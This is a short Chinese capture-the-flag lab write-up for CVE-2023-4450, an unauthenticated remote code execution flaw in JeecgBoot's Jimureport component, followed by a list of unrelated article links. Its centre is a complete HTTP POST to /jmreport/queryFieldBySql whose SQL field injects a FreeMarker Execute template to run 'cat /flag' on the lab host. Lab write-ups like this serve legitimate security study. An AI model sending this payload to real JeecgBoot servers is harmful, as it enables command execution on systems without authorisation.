【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞

靶场介绍

JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

开启靶场

漏洞利用

在搜索POC时,会发现直接访问URL是404

随机点击一个文档编辑,发现路径是从jmreport开始的

poc 复制代码
POST /jmreport/queryFieldBySql HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: */*
Accept-Encoding: gzip, deflate, br
Host: eci-2zefpkb9jv5tzsaox5zq.cloudeci1.ichunqiu.com:8080
Content-Type: application/json
Content-Length: 103

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\" cat /flag \") }' "}

获取flag

相关推荐
网络安全King1 小时前
计算机网络基础(2):网络安全/ 网络通信介质
计算机网络·安全·web安全
学习溢出2 小时前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
黑客Jack2 小时前
网络安全加密
安全·web安全·php
vortex54 小时前
Burp与其他安全工具联动及代理设置教程
网络·安全
xserver25 小时前
ensp 基于端口安全的财务部网络组建
网络·安全
x66ccff7 小时前
HTTPS如何通过CA证书实现安全通信,以及HTTPS的局限性
网络协议·安全·https
梁小憨憨7 小时前
机器学习(Machine Learning)的安全问题
人工智能·安全·机器学习
toto41215 小时前
线程安全与线程不安全
java·开发语言·安全